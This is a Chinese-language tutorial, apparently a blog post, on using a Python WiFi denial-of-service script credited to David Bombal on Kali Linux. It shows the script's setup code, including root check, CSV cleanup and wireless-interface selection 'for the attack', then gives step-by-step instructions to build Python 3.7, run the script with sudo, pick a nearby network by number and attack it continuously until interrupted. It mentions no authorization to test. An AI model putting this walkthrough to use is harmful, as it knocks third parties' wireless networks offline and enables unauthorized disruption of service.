
* kali linux 系统 这里使用的是虚拟机

2021-09-11 12-21-29 的屏幕截图.png
* 一张可以开启监听模式的网卡
* 两张网卡使用那一张都可以
* 本教程使用的是 python编写的脚本代码 以下是部分代码
* 在代码中作者写了大量的注释 以供使用者参考

active_wireless_networks = [] # We use this function to test if the ESSID is already in the list file. # If so we return False so we don't add it again. # If it is not in the lst we return True which will instruct the elif # statement to add it to the lst. def check_for_essid(essid, lst): check_status = True # If no ESSIDs in list add the row if len(lst) == 0: return check_status # This will only run if there are wireless access points in the list. for item in lst: # If True don't add to list. False will add it to list if essid in item["ESSID"]: check_status = False return check_status # Basic user interface header # This is a period of output, don't want you to do it. print(r"""______ _ _ ______ _ _ | _ \ (_) | | | ___ \ | | | | | | | |__ ___ ___ __| | | |_/ / ___ _ __ ___ | |__ __ _| | | | | / _` \ \ / / |/ _` | | ___ \/ _ \| '_ ` _ \| '_ \ / _` | | | |/ / (_| |\ V /| | (_| | | |_/ / (_) | | | | | | |_) | (_| | | |___/ \__,_| \_/ |_|\__,_| \____/ \___/|_| |_| |_|_.__/ \__,_|_|""") print("\n****************************************************************") print("\n* Copyright of David Bombal, 2021 *") print("\n* https://www.davidbombal.com *") print("\n* https://www.youtube.com/davidbombal *") print("\n****************************************************************") # If the user doesn't run the program with super user privileges, don't allow them to continue. if not 'SUDO_UID' in os.environ.keys(): print("Try running this program with sudo.") exit() # Remove .csv files before running the script. for file_name in os.listdir(): # We should only have one csv file as we delete them from the folder # every time we run the program. if ".csv" in file_name: print("There shouldn't be any .csv files in your directory. We found .csv files in your directory and will move them to the backup directory.") # We get the current working directory. directory = os.getcwd() try: # We make a new directory called /backup os.mkdir(directory + "/backup/") except: print("Backup folder exists.") # Create a timestamp timestamp = datetime.now() # We move any .csv files in the folder to the backup folder. shutil.move(file_name, directory + "/backup/" + str(timestamp) + "-" + file_name) # Regex to find wireless interfaces. We're making the assumption they will all be wlan0 or higher. wlan_pattern = re.compile("^wlan[0-9]+") # Python allows is to run system commands by using a function provided by the subprocess module. # subprocess.run(<list of command line arguments goes here>) # The script is the parent process and creates a child process which runs the system command, # and will only continue once the child process has completed. # We run the iwconfig command to look for wireless interfaces. check_wifi_result = wlan_pattern.findall(subprocess.run(["iwconfig"], capture_output=True).stdout.decode()) # No WiFi Adapter connected. if len(check_wifi_result) == 0: print("Please connect a WiFi adapter and try again.") exit() # Menu to select WiFi interface from print("The following WiFi interfaces are available:") for index, item in enumerate(check_wifi_result): print(f"{index} - {item}") # Ensure the WiFi interface selected is valid. Simple menu with interfaces to select from. while True: wifi_interface_choice = input("Please select the interface you want to use for the attack: ") try: if check_wifi_result[int(wifi_interface_choice)]: break except: print("Please enter a number that corresponds with the choices available.")
  • 将提前准备好的 网卡插入 电脑并切换到虚拟机
  • 由于kali linux 自带的python 不是3.7而是3.6 所以要重新下载 python
  • 打开终端 输入一下命令 下载
wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tgz
  • 解压压缩包
tar -zxvf Python-3.7.0.tgz # 将解压出来的文件夹复制到 /usr/local/ 目录下 cp -r python-3.7.0 /usr/local/
  • 然后进行编译安装
./configure --enable-optimizations --prefix=/usr/local/Python-3.7/ && make && make install
  • 在进入到解压出来的文件的位置后输入
./python --version

2021-09-10 18-47-22 ����Ļ��ͼ.png

  • 在下载的python文件夹里 运行 python文件 s
  • 上面的代码文件我已经放在了 ~/ 目录下
sudo ./python ~/wifi_dos_type1.py
  • 这里会提示 插入的网卡 wlan0
  • 因为这里只有一张 所以就只有一个 输入网卡前的序号
    2021-09-10 18-47-30 ����Ļ��ͼ.png
  • 这里是自动开启网卡的监听模式 来扫描附近的WiFi
  • 再按下 之后 会出现提示 在这里输入要攻击WiFi编号
    2021-09-10 18-50-42 ����Ļ��ͼ.png
  • 输入编号之后 会自动攻击知道关掉终端或者 按 ctrl + c 强行中断

2021-09-10 19-08-14 ����Ļ��ͼ.png


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